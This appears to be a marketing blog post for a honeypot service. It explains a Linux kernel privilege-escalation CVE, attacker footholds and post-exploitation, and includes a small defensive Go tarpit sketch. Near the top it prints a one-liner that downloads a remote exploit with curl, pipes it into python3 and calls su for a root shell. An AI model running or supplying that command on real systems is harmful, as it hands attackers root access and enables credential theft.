CVE-2026-31431 dropped this week. The disclosure site is at copy.fail and the writeup is short enough to read with coffee.
The TL;DR: a logic flaw in the kernel's authencesn path, reachable through AF_ALG sockets, abused via splice() to land a 4-byte write into the page cache of any setuid binary. They picked /usr/bin/su for the demo. The whole exploit is 732 bytes of Python 3 standard library. No race window. No kernel offsets. Reliable across every affected distro from 2017 onward.
Quick run:
$ curl https://copy.fail/exp | python3 && su
#
Root shell. The kernel hands it over because AF_ALG is on by default and authencesn does the wrong thing under splice().
The bit nobody is talking about
Copy Fail is a local privilege escalation. The attacker still needs an unprivileged shell on your box to fire it.
That shell doesn't come from your hardened SSH. It comes from the WordPress plugin you forgot was installed. The Grafana on :3000. The Jenkins your CI team spun up two years ago. The leaked GitHub PAT in a public gist. The n-day on your firewall vendor that everyone is still patching.
They land as www-data. They run the 732-byte one-liner. They're root. Backdoor in /etc/cron.d/. known_hosts dumped. AWS keys pulled from ~/.aws/credentials. Your Ansible inventory is now their target list. Friday they're inside. Sunday they push. Monday your /home is on a leak site and you're explaining to legal why prod creds lived on a Jenkins worker.
What we actually see
I run TarPit.pro. It's a honeypot that answers on the ports your real services listen on, hands attackers a believable banner, then tarpits and bans them. Across 5 boxes in the last 20 days:
- ~40,000 attack attempts
- ~14,000 unique source IPs
- ~5,000 IPs auto-banned
- Top ports hit: SSH (14k), Telnet (3.2k), SMB (2.2k)
- Top sources: US, China, UK, Hong Kong, Netherlands
That's the foothold market. Those are the IPs that, in another month, will be the ones running curl copy.fail/exp | python3 on whichever box they land on first.
Patch the kernel. Of course. Then drown them at the door.
You're going to patch; distros are already shipping fixes. But the next CVE is already being written, and the foothold pipeline doesn't care which kernel you're running.
A honeypot doesn't replace patching. It buys you the one thing you can't get anywhere else: the brute-forcer wastes their session on a fake SSH that never lets them in, gets banned across your fleet on the first connection, and never reaches the box where Copy Fail, or whatever comes next, would have actually mattered.
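To make the fake-banner-then-ban idea concrete, here is a minimal Go sketch of that loop. It is an added example, not TarPit.pro's code: the banner string, the ban threshold of one connection, and the 200 ms per-byte delay are assumptions, and the "push to the fleet" step is only a print.

```go
package main

import (
	"fmt"
	"net"
	"time"
)

const (
	banner       = "SSH-2.0-OpenSSH_9.6\r\n" // what a scanner expects from sshd; nothing behind it answers
	banThreshold = 1                         // a honeypot port has no legitimate clients, so one hit is enough
)

// BanList counts connections per source address; only the accept loop touches it.
type BanList map[string]int

// Record counts one connection from ip and reports whether ip is now banned.
func (b BanList) Record(ip string) bool {
	b[ip]++
	return b[ip] >= banThreshold
}

// Tarpit feeds the banner one byte at a time with a pause between bytes, so the
// client's version exchange never completes, then closes. Returns bytes sent.
func Tarpit(conn net.Conn, delay time.Duration) int {
	defer conn.Close()
	for i := 0; i < len(banner); i++ {
		if _, err := conn.Write([]byte{banner[i]}); err != nil {
			return i
		}
		time.Sleep(delay)
	}
	return len(banner)
}

// Serve records every source and tarpits it; a ban would be pushed to the
// rest of the fleet here (this example just prints it).
func Serve(ln net.Listener, bans BanList) {
	for {
		c, err := ln.Accept()
		if err != nil {
			return
		}
		ip, _, _ := net.SplitHostPort(c.RemoteAddr().String())
		if bans.Record(ip) {
			fmt.Println("ban", ip)
		}
		go Tarpit(c, 200*time.Millisecond)
	}
}
```

Run it by passing a net.Listen listener on the port the real service would use to Serve together with an empty BanList.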
Try it free: https://tarpit.pro
Single Go binary, systemd, fake banners on 70+ services, fleet-wide bans across your servers. Free tier covers up to 2 servers with the cloud dashboard. Coupon LAUNCH101 gives 2 months free on Starter or Pro.